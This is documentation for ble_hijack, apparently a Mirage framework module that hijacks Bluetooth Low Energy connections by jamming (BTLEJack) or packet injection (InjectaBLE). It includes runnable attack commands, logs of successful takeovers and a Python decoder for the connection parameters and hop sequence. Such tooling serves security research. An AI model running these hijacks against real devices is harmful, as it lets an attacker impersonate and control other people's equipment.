ble_hijack

Presentation

ble_hijack implements active attacks that hijack either the slave or the master role of a Bluetooth Low Energy connection. It can perform the jamming-based BTLEJack attack, which hijacks the master or the slave role, as well as the injection-based hijacking attacks provided by InjectaBLE.

  • The BTLEJack attack sniffs an established connection, synchronizes to it and jams the packets emitted by the slave. As a consequence, once the master reaches its supervision timeout it disconnects from the slave device, and the attacker can communicate with the slave device in its place.

  • The InjectaBLE attack sniffs a connection, injects a malicious packet into it to disconnect the master or the slave, then synchronizes with the remaining device and mimics the hijacked role.

This module can hijack a new connection (input parameter HIJACKING_MODE set to “newConnections”) or an established connection (HIJACKING_MODE set to “existingConnections”). Additional parameters can be provided to help the module find the right target: TARGET for a new connection, or ACCESS_ADDRESS, CRC_INIT and CHANNEL_MAP for an existing connection. This module needs ble_sniff and cannot be used alone: once the connection is hijacked, the module terminates, handing over to the next module in the chain, such as ble_master or ble_discover. It is used in the same way as the module ble_connect.

Warning

These attacks are sometimes unstable, and may require multiple attempts. This module is experimental and is only provided as a proof of concept.

Compatible devices

Input parameters

Name            Default value    Possible values                      Description
INTERFACE       microbit0        microbitX, butterflyX                Primary interface to use
INTERFACEA                       microbitX, butterflyX                Optional additional interface
INTERFACEB                       microbitX, butterflyX                Optional additional interface
TARGET                           <BD address>                         Target address
CHANNEL         37               37|38|39                             Communication channel to observe
HIJACKING_MODE  newConnections   newConnections|existingConnections   Hijacking strategy
ROLE            master           master|slave                         Role to hijack
ACCESS_ADDRESS                   0xYYYY                               Access address of an existing connection
CRC_INIT                         0xYYYYYY                             CRCInit of an existing connection
CHANNEL_MAP                      0xYYYYYYYYYY                         Channel map of an existing connection

Output parameters

Name        Possible values    Description
INTERFACE   microbitX          Primary interface used

Usage

Hijacking the master role in a new connection

With a Microbit device the hijacking strategy is based on jamming, whereas with a ButteRFly device it is based on the InjectaBLE attack (i.e. injecting a malicious packet into an established BLE connection). To hijack a new connection, set the input parameter HIJACKING_MODE to “newConnections” and the input parameter ROLE to “master”:

$ sudo mirage "ble_hijack|ble_master" ble_hijack1.HIJACKING_MODE=newConnections ble_hijack1.ROLE=master
[INFO] Module ble_hijack loaded !
[INFO] Module ble_master loaded !
[SUCCESS] BTLEJack device #0 successfully instantiated (firmware version : 3.14)
[INFO] Custom Mirage Firmware used ! Advertisements sniffing and jamming will be supported.
┌Sniffed Connection─────────┬──────────────┬──────────────┬───────────────┐
│ Access Address │ CRCInit  │ Channel Map  │ Hop Interval │ Hop Increment │
├────────────────┼──────────┼──────────────┼──────────────┼───────────────┤
│ 0x88262126     │ 0xe12e70 │ 0x1e007fffff │ 36           │ 6             │
└────────────────┴──────────┴──────────────┴──────────────┴───────────────┘
[INFO] Recovering Hop Interval ...
[SUCCESS] Hop Interval successfully recovered : 36
[INFO] Recovering Hop Increment ...
[SUCCESS] Hop Increment successfully recovered : 6
[INFO] All parameters recovered, following connection ...
┌Sniffed Connection─────────┬──────────────┬──────────────┬───────────────┐
│ Access Address │ CRCInit  │ Channel Map  │ Hop Interval │ Hop Increment │
├────────────────┼──────────┼──────────────┼──────────────┼───────────────┤
│ 0x88262126     │ 0xe12e70 │ 0x1e007fffff │ 36           │ 6             │
└────────────────┴──────────┴──────────────┴──────────────┴───────────────┘
[INFO] Hijacking in progress ...
[MASTER|0x88262126]:

Then you can use ble_master exactly as if you had run it alone or with ble_connect.

Hijacking the master role in an existing connection

Similarly, to hijack an existing connection, set the input parameter HIJACKING_MODE to “existingConnections”:

$ sudo mirage "ble_hijack|ble_master" ble_hijack1.HIJACKING_MODE=existingConnections ble_hijack1.ROLE=master

The execution then proceeds much as described above.

Hijacking the slave role in a new connection

Slave hijacking requires a ButteRFly device and relies on the InjectaBLE attack. Set the input parameter HIJACKING_MODE to “newConnections” and the input parameter ROLE to “slave”:

sudo mirage "ble_hijack|ble_slave" ble_hijack1.INTERFACE=butterfly0 ble_hijack1.HIJACKING_MODE=newConnections ble_hijack1.ROLE=slave
[sudo] Mot de passe de rcayre :
[INFO] Module ble_hijack loaded !
[INFO] Module ble_slave loaded !
[SUCCESS] ButteRFly device successfully instantiated !
[PACKET] [ CH:37|CLK:158609287.0|RSSI:0dBm ] << BLE - Advertisement Packet | type=CONNECT_REQ | srcAddr=5B:F0:E9:8F:91:46 | dstAddr=74:DA:EA:91:47:E3 | accessAddress=0x9e25da8b| crcInit=0x832bb3| channelMap=0x1fffe007ff| hopInterval=36| hopIncrement=9 >>

┌Sniffed Connection─────────┬──────────────┬──────────────┬───────────────┐
│ Access Address │ CRCInit  │ Channel Map  │ Hop Interval │ Hop Increment │
├────────────────┼──────────┼──────────────┼──────────────┼───────────────┤
│ 0x8bda259e     │ 0xb32b83 │ 0x1fffe007ff │ 36           │ 9             │
└────────────────┴──────────┴──────────────┴──────────────┴───────────────┘
[INFO] Attack started in 5 seconds...
[PACKET] [ CH:9|CLK:158638763.0|RSSI:0dBm ] << BLE - Control PDU Packet | type=LL_FEATURE_REQ | data=ff7d000000000000 >>
[...]
[PACKET] [ CH:23|CLK:161293813.0|RSSI:0dBm ] << BLE - Control PDU Packet | type=LL_CHANNEL_MAP_REQ | data=ff01e0ff1f8d00 >>
[INFO] Starting Master Hijacking attack: injecting LL_TERMINATE_IND...
[SUCCESS] Attack successful !
[INFO] SubInterface available: butterfly0:sub1 (slave)
[INFO] Instantiating subdevice :butterfly0:sub1
[INFO] No filename provided : empty database !
[SLAVE]:

Then you can use ble_slave exactly as if you had run it directly.
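As an added example (not Mirage's own code), the following Python script decodes the parameters the module recovers in the runs above: it parses the CONNECT_REQ line and the LL_CHANNEL_MAP_REQ payload from the slave-hijacking run, shows the byte-order relationship between the packet dump (0x9e25da8b, 0x832bb3) and the “Sniffed Connection” table (0x8bda259e, 0xb32b83), and derives the data-channel hop sequence with channel selection algorithm #1 from the Bluetooth Core specification, which generalizes to any channel map and hop increment. The log-line format the regex expects is assumed from the lines shown on this page.

```python
"""Decode the BLE connection parameters seen in ble_hijack's output (added
example, not part of Mirage): parse the CONNECT_REQ log line, decode the
LL_CHANNEL_MAP_REQ payload and derive the hop sequence with CSA #1."""
import re

# Constructed sample input: copied from the [PACKET] lines on this page.
CONNECT_REQ_LINE = ("[PACKET] [ CH:37|CLK:158609287.0|RSSI:0dBm ] << BLE - "
    "Advertisement Packet | type=CONNECT_REQ | srcAddr=5B:F0:E9:8F:91:46 | "
    "dstAddr=74:DA:EA:91:47:E3 | accessAddress=0x9e25da8b| crcInit=0x832bb3| "
    "channelMap=0x1fffe007ff| hopInterval=36| hopIncrement=9 >>")
CHANNEL_MAP_REQ_DATA = "ff01e0ff1f8d00"  # LL_CHANNEL_MAP_REQ payload on the page

def reverse_byte_order(value, nbytes):
    """Reinterpret an integer's bytes in the opposite endianness (0x9e25da8b <-> 0x8bda259e)."""
    return int.from_bytes(value.to_bytes(nbytes, "big"), "little")

def parse_connect_req(line):
    """Extract the connection parameters from a Mirage CONNECT_REQ log line."""
    f = dict(re.findall(r"(\w+)=([^\s|>]+)", line))
    aa, crc = int(f["accessAddress"], 16), int(f["crcInit"], 16)
    return {"access_address": aa, "access_address_swapped": reverse_byte_order(aa, 4),
            "crc_init": crc, "crc_init_swapped": reverse_byte_order(crc, 3),
            "channel_map": int(f["channelMap"], 16),
            "hop_interval": int(f["hopInterval"]),
            "hop_increment": int(f["hopIncrement"])}

def parse_channel_map_req(data_hex):
    """LL_CHANNEL_MAP_REQ payload: 5-byte ChM then 2-byte Instant, little-endian."""
    raw = bytes.fromhex(data_hex)
    if len(raw) != 7:
        raise ValueError("LL_CHANNEL_MAP_REQ payload must be 7 bytes")
    return {"channel_map": int.from_bytes(raw[:5], "little"),
            "instant": int.from_bytes(raw[5:], "little")}

def hop_sequence(channel_map, hop_increment, count, last_unmapped=0):
    """Channel selection algorithm #1 (LE 4.x): unmapped = (last + hopIncrement)
    mod 37; an unused channel is remapped to used[unmapped mod len(used)]."""
    used = [ch for ch in range(37) if channel_map >> ch & 1]
    if len(used) < 2 or not 5 <= hop_increment <= 16:
        raise ValueError("invalid channel map or hop increment")
    seq = []
    for _ in range(count):
        last_unmapped = (last_unmapped + hop_increment) % 37
        seq.append(last_unmapped if channel_map >> last_unmapped & 1
                   else used[last_unmapped % len(used)])
    return seq

if __name__ == "__main__":
    p = parse_connect_req(CONNECT_REQ_LINE)  # first hop is channel 9, as in the CH:9 log line
    print(hex(p["access_address_swapped"]), hop_sequence(p["channel_map"], p["hop_increment"], 8))
```

The first computed data channel is 9, which matches the CH:9 LL_FEATURE_REQ that follows the CONNECT_REQ in the log above.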